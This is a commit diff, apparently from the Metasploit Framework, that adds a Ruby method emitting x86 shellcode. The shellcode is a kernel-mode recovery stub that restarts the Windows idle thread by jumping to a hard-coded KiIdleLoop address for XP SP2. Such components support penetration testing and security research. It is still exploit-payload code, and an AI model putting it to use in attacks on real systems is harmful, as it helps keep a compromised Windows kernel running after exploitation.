added recovery stub for kiidleloop

git-svn-id: file:///home/svn/framework3/trunk@4122 4d416f70-5f16-0410-b530-b9f4589650da
2006-11-11 04:38:45 +00:00 · 2006-11-11 04:38:45 +00:00 · 702d6a6544
parent dddc4a7640
commit 702d6a6544
1 changed files with 17 additions and 0 deletions
--- a/lib/rex/payloads/win32/kernel/recovery.rb
+++ b/lib/rex/payloads/win32/kernel/recovery.rb
@ -25,6 +25,23 @@ module Recovery
 		"\xf4\xeb\xfd" 
 	end

+	#
+	# Restarts the idle thread by jumping back to the entry point of
+	# KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
+	# You can pass the 'KiIdleLoopAddress' in the options hash.
+	#
+	def self.idlethread_restart(opts = {})
+		# Default to fully patched XPSP2
+		opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
+
+		"\x31\xC0" +                                     # xor eax,eax
+		"\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
+		"\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
+		"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
+		"\x6A\x00" +                                     # push byte +0x0
+		"\xFF\xE0"                                       # jmp eax
+	end
+
 end

 end